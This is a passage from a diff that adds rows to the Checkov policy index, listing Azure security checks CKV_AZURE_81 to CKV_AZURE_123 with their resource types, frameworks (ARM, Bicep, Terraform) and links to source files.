[AppServicePHPVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePHPVersion.py) | +| 1837 | CKV_AZURE_81 | resource | Microsoft.Web/sites | Ensure that 'PHP version' is the latest, if used to run the web app | Bicep | [AppServicePHPVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePHPVersion.py) | +| 1838 | CKV_AZURE_81 | resource | azurerm_app_service | Ensure that 'PHP version' is the latest, if used to run the web app | Terraform | [AppServicePHPVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePHPVersion.py) | +| 1839 | CKV_AZURE_82 | resource | Microsoft.Web/sites | Ensure that 'Python version' is the latest, if used to run the web app | arm | [AppServicePythonVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePythonVersion.py) | +| 1840 | 
CKV_AZURE_82 | resource | Microsoft.Web/sites | Ensure that 'Python version' is the latest, if used to run the web app | Bicep | [AppServicePythonVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePythonVersion.py) | +| 1841 | CKV_AZURE_82 | resource | azurerm_app_service | Ensure that 'Python version' is the latest, if used to run the web app | Terraform | [AppServicePythonVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePythonVersion.py) | +| 1842 | CKV_AZURE_83 | resource | Microsoft.Web/sites | Ensure that 'Java version' is the latest, if used to run the web app | arm | [AppServiceJavaVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceJavaVersion.py) | +| 1843 | CKV_AZURE_83 | resource | Microsoft.Web/sites | Ensure that 'Java version' is the latest, if used to run the web app | Bicep | [AppServiceJavaVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceJavaVersion.py) | +| 1844 | CKV_AZURE_83 | resource | azurerm_app_service | Ensure that 'Java version' is the latest, if used to run the web app | Terraform | [AppServiceJavaVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceJavaVersion.py) | +| 1845 | CKV_AZURE_84 | resource | Microsoft.Security/pricings | Ensure that Azure Defender is set to On for Storage | arm | [AzureDefenderOnStorage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnStorage.py) | +| 1846 | CKV_AZURE_84 | resource | Microsoft.Security/pricings | Ensure that Azure Defender is set to On for Storage | Bicep | [AzureDefenderOnStorage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnStorage.py) | +| 1847 | CKV_AZURE_84 | resource | azurerm_security_center_subscription_pricing | Ensure 
that Azure Defender is set to On for Storage | Terraform | [AzureDefenderOnStorage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnStorage.py) | +| 1848 | CKV_AZURE_85 | resource | Microsoft.Security/pricings | Ensure that Azure Defender is set to On for Kubernetes | arm | [AzureDefenderOnKubernetes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnKubernetes.py) | +| 1849 | CKV_AZURE_85 | resource | Microsoft.Security/pricings | Ensure that Azure Defender is set to On for Kubernetes | Bicep | [AzureDefenderOnKubernetes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnKubernetes.py) | +| 1850 | CKV_AZURE_85 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Kubernetes | Terraform | [AzureDefenderOnKubernetes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnKubernetes.py) | +| 1851 | CKV_AZURE_86 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Container Registries | Terraform | [AzureDefenderOnContainerRegistry.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnContainerRegistry.py) | +| 1852 | CKV_AZURE_87 | resource | Microsoft.Security/pricings | Ensure that Azure Defender is set to On for Key Vault | arm | [AzureDefenderOnKeyVaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnKeyVaults.py) | +| 1853 | CKV_AZURE_87 | resource | Microsoft.Security/pricings | Ensure that Azure Defender is set to On for Key Vault | Bicep | [AzureDefenderOnKeyVaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnKeyVaults.py) | +| 1854 | CKV_AZURE_87 | resource | azurerm_security_center_subscription_pricing 
| Ensure that Azure Defender is set to On for Key Vault | Terraform | [AzureDefenderOnKeyVaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnKeyVaults.py) | +| 1855 | CKV_AZURE_88 | resource | Microsoft.Web/sites/config | Ensure that app services use Azure Files | arm | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceUsedAzureFiles.py) | +| 1856 | CKV_AZURE_88 | resource | Microsoft.Web/sites/config | Ensure that app services use Azure Files | Bicep | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceUsedAzureFiles.py) | +| 1857 | CKV_AZURE_88 | resource | azurerm_app_service | Ensure that app services use Azure Files | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py) | +| 1858 | CKV_AZURE_88 | resource | azurerm_linux_web_app | Ensure that app services use Azure Files | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py) | +| 1859 | CKV_AZURE_88 | resource | azurerm_windows_web_app | Ensure that app services use Azure Files | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py) | +| 1860 | CKV_AZURE_89 | resource | Microsoft.Cache/redis | Ensure that Azure Cache for Redis disables public network access | arm | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/RedisCachePublicNetworkAccessEnabled.py) | +| 1861 | CKV_AZURE_89 | resource | Microsoft.Cache/redis | Ensure that Azure Cache for Redis disables public network access | Bicep | 
[RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/RedisCachePublicNetworkAccessEnabled.py) | +| 1862 | CKV_AZURE_89 | resource | azurerm_redis_cache | Ensure that Azure Cache for Redis disables public network access | Terraform | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCachePublicNetworkAccessEnabled.py) | +| 1863 | CKV_AZURE_91 | resource | azurerm_redis_cache | Ensure that only SSL are enabled for Cache for Redis | Terraform | [RedisCacheEnableNonSSLPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheEnableNonSSLPort.py) | +| 1864 | CKV_AZURE_92 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual Machines use managed disks | arm | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMStorageOsDisk.py) | +| 1865 | CKV_AZURE_92 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual Machines use managed disks | Bicep | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMStorageOsDisk.py) | +| 1866 | CKV_AZURE_92 | resource | azurerm_linux_virtual_machine | Ensure that Virtual Machines use managed disks | Terraform | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMStorageOsDisk.py) | +| 1867 | CKV_AZURE_92 | resource | azurerm_windows_virtual_machine | Ensure that Virtual Machines use managed disks | Terraform | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMStorageOsDisk.py) | +| 1868 | CKV_AZURE_93 | resource | Microsoft.Compute/disks | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | arm | 
[AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiskEncryptionSet.py) | +| 1869 | CKV_AZURE_93 | resource | Microsoft.Compute/disks | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | Bicep | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiskEncryptionSet.py) | +| 1870 | CKV_AZURE_93 | resource | azurerm_managed_disk | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | Terraform | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureManagedDiskEncryptionSet.py) | +| 1871 | CKV_AZURE_94 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that My SQL server enables geo-redundant backups | arm | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLGeoBackupEnabled.py) | +| 1872 | CKV_AZURE_94 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that My SQL server enables geo-redundant backups | Bicep | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLGeoBackupEnabled.py) | +| 1873 | CKV_AZURE_94 | resource | azurerm_mysql_flexible_server | Ensure that My SQL server enables geo-redundant backups | Terraform | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLGeoBackupEnabled.py) | +| 1874 | CKV_AZURE_94 | resource | azurerm_mysql_server | Ensure that My SQL server enables geo-redundant backups | Terraform | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLGeoBackupEnabled.py) | +| 1875 | CKV_AZURE_95 | resource | 
Microsoft.Compute/virtualMachineScaleSets | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets | arm | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMScaleSetsAutoOSImagePatchingEnabled.py) | +| 1876 | CKV_AZURE_95 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets | Bicep | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMScaleSetsAutoOSImagePatchingEnabled.py) | +| 1877 | CKV_AZURE_95 | resource | azurerm_virtual_machine_scale_set | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets | Terraform | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMScaleSetsAutoOSImagePatchingEnabled.py) | +| 1878 | CKV_AZURE_96 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that MySQL server enables infrastructure encryption | arm | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLEncryptionEnabled.py) | +| 1879 | CKV_AZURE_96 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that MySQL server enables infrastructure encryption | Bicep | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLEncryptionEnabled.py) | +| 1880 | CKV_AZURE_96 | resource | azurerm_mysql_server | Ensure that MySQL server enables infrastructure encryption | Terraform | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLEncryptionEnabled.py) | +| 1881 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine scale sets have encryption at host enabled | arm | 
[VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) | +| 1882 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine scale sets have encryption at host enabled | Bicep | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) | +| 1883 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine scale sets have encryption at host enabled | arm | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) | +| 1884 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine scale sets have encryption at host enabled | Bicep | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) | +| 1885 | CKV_AZURE_97 | resource | azurerm_linux_virtual_machine_scale_set | Ensure that Virtual machine scale sets have encryption at host enabled | Terraform | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMEncryptionAtHostEnabled.py) | +| 1886 | CKV_AZURE_97 | resource | azurerm_windows_virtual_machine_scale_set | Ensure that Virtual machine scale sets have encryption at host enabled | Terraform | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMEncryptionAtHostEnabled.py) | +| 1887 | CKV_AZURE_98 | resource | azurerm_container_group | Ensure that Azure Container group is deployed into virtual network | Terraform | [AzureContainerGroupDeployedIntoVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureContainerGroupDeployedIntoVirtualNetwork.py) | 
+| 1888 | CKV_AZURE_99 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure Cosmos DB accounts have restricted access | arm | [CosmosDBAccountsRestrictedAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBAccountsRestrictedAccess.py) | +| 1889 | CKV_AZURE_99 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure Cosmos DB accounts have restricted access | Bicep | [CosmosDBAccountsRestrictedAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBAccountsRestrictedAccess.py) | +| 1890 | CKV_AZURE_99 | resource | azurerm_cosmosdb_account | Ensure Cosmos DB accounts have restricted access | Terraform | [CosmosDBAccountsRestrictedAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBAccountsRestrictedAccess.py) | +| 1891 | CKV_AZURE_100 | resource | Microsoft.DocumentDb/databaseAccounts | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest | arm | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBHaveCMK.py) | +| 1892 | CKV_AZURE_100 | resource | Microsoft.DocumentDb/databaseAccounts | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest | Bicep | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBHaveCMK.py) | +| 1893 | CKV_AZURE_100 | resource | azurerm_cosmosdb_account | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest | Terraform | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBHaveCMK.py) | +| 1894 | CKV_AZURE_101 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure that Azure Cosmos DB disables public network access | arm | 
[CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisablesPublicNetwork.py) |
+| 1895 | CKV_AZURE_101 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure that Azure Cosmos DB disables public network access | Bicep | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisablesPublicNetwork.py) |
+| 1896 | CKV_AZURE_101 | resource | azurerm_cosmosdb_account | Ensure that Azure Cosmos DB disables public network access | Terraform | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBDisablesPublicNetwork.py) |
+| 1897 | CKV_AZURE_102 | resource | Microsoft.DBforPostgreSQL/servers | Ensure that PostgreSQL server enables geo-redundant backups | arm | [PostgressSQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgressSQLGeoBackupEnabled.py) |
+| 1898 | CKV_AZURE_102 | resource | Microsoft.DBforPostgreSQL/servers | Ensure that PostgreSQL server enables geo-redundant backups | Bicep | [PostgressSQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgressSQLGeoBackupEnabled.py) |
+| 1899 | CKV_AZURE_102 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables geo-redundant backups | Terraform | [PostgressSQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgressSQLGeoBackupEnabled.py) |
+| 1900 | CKV_AZURE_103 | resource | Microsoft.DataFactory/factories | Ensure that Azure Data Factory uses Git repository for source control | arm | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryUsesGitRepository.py) |
+| 1901 | CKV_AZURE_103 | resource | Microsoft.DataFactory/factories | Ensure that 
Azure Data Factory uses Git repository for source control | Bicep | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryUsesGitRepository.py) |
+| 1902 | CKV_AZURE_103 | resource | azurerm_data_factory | Ensure that Azure Data Factory uses Git repository for source control | Terraform | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataFactoryUsesGitRepository.py) |
+| 1903 | CKV_AZURE_104 | resource | Microsoft.DataFactory/factories | Ensure that Azure Data factory public network access is disabled | arm | [DataFactoryNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryNoPublicNetworkAccess.py) |
+| 1904 | CKV_AZURE_104 | resource | Microsoft.DataFactory/factories | Ensure that Azure Data factory public network access is disabled | Bicep | [DataFactoryNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryNoPublicNetworkAccess.py) |
+| 1905 | CKV_AZURE_104 | resource | azurerm_data_factory | Ensure that Azure Data factory public network access is disabled | Terraform | [DataFactoryNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataFactoryNoPublicNetworkAccess.py) |
+| 1906 | CKV_AZURE_105 | resource | Microsoft.DataLakeStore/accounts | Ensure that Data Lake Store accounts enables encryption | arm | [DataLakeStoreEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataLakeStoreEncryption.py) |
+| 1907 | CKV_AZURE_105 | resource | Microsoft.DataLakeStore/accounts | Ensure that Data Lake Store accounts enables encryption | Bicep | [DataLakeStoreEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataLakeStoreEncryption.py) |
+| 1908 | CKV_AZURE_105 | 
resource | azurerm_data_lake_store | Ensure that Data Lake Store accounts enables encryption | Terraform | [DataLakeStoreEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataLakeStoreEncryption.py) |
+| 1909 | CKV_AZURE_106 | resource | azurerm_eventgrid_domain | Ensure that Azure Event Grid Domain public network access is disabled | Terraform | [EventgridDomainNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainNetworkAccess.py) |
+| 1910 | CKV_AZURE_107 | resource | Microsoft.ApiManagement/service | Ensure that API management services use virtual networks | arm | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIServicesUseVirtualNetwork.py) |
+| 1911 | CKV_AZURE_107 | resource | Microsoft.ApiManagement/service | Ensure that API management services use virtual networks | Bicep | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIServicesUseVirtualNetwork.py) |
+| 1912 | CKV_AZURE_107 | resource | azurerm_api_management | Ensure that API management services use virtual networks | Terraform | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIServicesUseVirtualNetwork.py) |
+| 1913 | CKV_AZURE_108 | resource | azurerm_iothub | Ensure that Azure IoT Hub disables public network access | Terraform | [IoTNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/IoTNoPublicNetworkAccess.py) |
+| 1914 | CKV_AZURE_109 | resource | Microsoft.KeyVault/vaults | Ensure that key vault allows firewall rules settings | arm | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesFirewallRulesSettings.py) |
+| 1915 | 
CKV_AZURE_109 | resource | Microsoft.KeyVault/vaults | Ensure that key vault allows firewall rules settings | Bicep | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesFirewallRulesSettings.py) |
+| 1916 | CKV_AZURE_109 | resource | azurerm_key_vault | Ensure that key vault allows firewall rules settings | Terraform | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesFirewallRulesSettings.py) |
+| 1917 | CKV_AZURE_110 | resource | Microsoft.KeyVault/vaults | Ensure that key vault enables purge protection | arm | [KeyVaultEnablesPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesPurgeProtection.py) |
+| 1918 | CKV_AZURE_110 | resource | Microsoft.KeyVault/vaults | Ensure that key vault enables purge protection | Bicep | [KeyVaultEnablesPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesPurgeProtection.py) |
+| 1919 | CKV_AZURE_110 | resource | azurerm_key_vault | Ensure that key vault enables purge protection | Terraform | [KeyVaultEnablesPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesPurgeProtection.py) |
+| 1920 | CKV_AZURE_111 | resource | Microsoft.KeyVault/vaults | Ensure that key vault enables soft delete | arm | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesSoftDelete.py) |
+| 1921 | CKV_AZURE_111 | resource | Microsoft.KeyVault/vaults | Ensure that key vault enables soft delete | Bicep | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesSoftDelete.py) |
+| 1922 | CKV_AZURE_111 | resource | azurerm_key_vault | Ensure that key vault 
enables soft delete | Terraform | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesSoftDelete.py) |
+| 1923 | CKV_AZURE_112 | resource | Microsoft.KeyVault/vaults/keys | Ensure that key vault key is backed by HSM | arm | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyBackedByHSM.py) |
+| 1924 | CKV_AZURE_112 | resource | Microsoft.KeyVault/vaults/keys | Ensure that key vault key is backed by HSM | Bicep | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyBackedByHSM.py) |
+| 1925 | CKV_AZURE_112 | resource | azurerm_key_vault_key | Ensure that key vault key is backed by HSM | Terraform | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyBackedByHSM.py) |
+| 1926 | CKV_AZURE_113 | resource | Microsoft.Sql/servers | Ensure that SQL server disables public network access | arm | [SQLServerHasPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerHasPublicAccessDisabled.py) |
+| 1927 | CKV_AZURE_113 | resource | Microsoft.Sql/servers | Ensure that SQL server disables public network access | Bicep | [SQLServerHasPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerHasPublicAccessDisabled.py) |
+| 1928 | CKV_AZURE_113 | resource | azurerm_mssql_server | Ensure that SQL server disables public network access | Terraform | [SQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerPublicAccessDisabled.py) |
+| 1929 | CKV_AZURE_114 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that key vault secrets have "content_type" set | arm | 
[SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretContentType.py) |
+| 1930 | CKV_AZURE_114 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that key vault secrets have "content_type" set | Bicep | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretContentType.py) |
+| 1931 | CKV_AZURE_114 | resource | azurerm_key_vault_secret | Ensure that key vault secrets have "content_type" set | Terraform | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecretContentType.py) |
+| 1932 | CKV_AZURE_115 | resource | azurerm_kubernetes_cluster | Ensure that AKS enables private clusters | Terraform | [AKSEnablesPrivateClusters.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEnablesPrivateClusters.py) |
+| 1933 | CKV_AZURE_116 | resource | azurerm_kubernetes_cluster | Ensure that AKS uses Azure Policies Add-on | Terraform | [AKSUsesAzurePoliciesAddon.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUsesAzurePoliciesAddon.py) |
+| 1934 | CKV_AZURE_117 | resource | azurerm_kubernetes_cluster | Ensure that AKS uses disk encryption set | Terraform | [AKSUsesDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUsesDiskEncryptionSet.py) |
+| 1935 | CKV_AZURE_118 | resource | azurerm_network_interface | Ensure that Network Interfaces disable IP forwarding | Terraform | [NetworkInterfaceEnableIPForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NetworkInterfaceEnableIPForwarding.py) |
+| 1936 | CKV_AZURE_119 | resource | azurerm_network_interface | Ensure that Network Interfaces don't use public IPs | Terraform | 
[AzureNetworkInterfacePublicIPAddressId.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureNetworkInterfacePublicIPAddressId.yaml) |
+| 1937 | CKV_AZURE_120 | resource | azurerm_application_gateway | Ensure that Application Gateway enables WAF | Terraform | [ApplicationGatewayEnablesWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/ApplicationGatewayEnablesWAF.yaml) |
+| 1938 | CKV_AZURE_120 | resource | azurerm_web_application_firewall_policy | Ensure that Application Gateway enables WAF | Terraform | [ApplicationGatewayEnablesWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/ApplicationGatewayEnablesWAF.yaml) |
+| 1939 | CKV_AZURE_121 | resource | Microsoft.Network/frontDoors | Ensure that Azure Front Door enables WAF | arm | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFrontDoorEnablesWAF.py) |
+| 1940 | CKV_AZURE_121 | resource | Microsoft.Network/frontDoors | Ensure that Azure Front Door enables WAF | Bicep | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFrontDoorEnablesWAF.py) |
+| 1941 | CKV_AZURE_121 | resource | azurerm_frontdoor | Ensure that Azure Front Door enables WAF | Terraform | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFrontDoorEnablesWAF.py) |
+| 1942 | CKV_AZURE_122 | resource | azurerm_web_application_firewall_policy | Ensure that Application Gateway uses WAF in "Detection" or "Prevention" modes | Terraform | [AppGWUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWUseWAFMode.py) |
+| 1943 | CKV_AZURE_123 | resource | Microsoft.Network/FrontDoorWebApplicationFirewallPolicies | Ensure that Azure Front Door uses WAF 
in "Detection" or "Prevention" modes | arm | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontdoorUseWAFMode.py) |
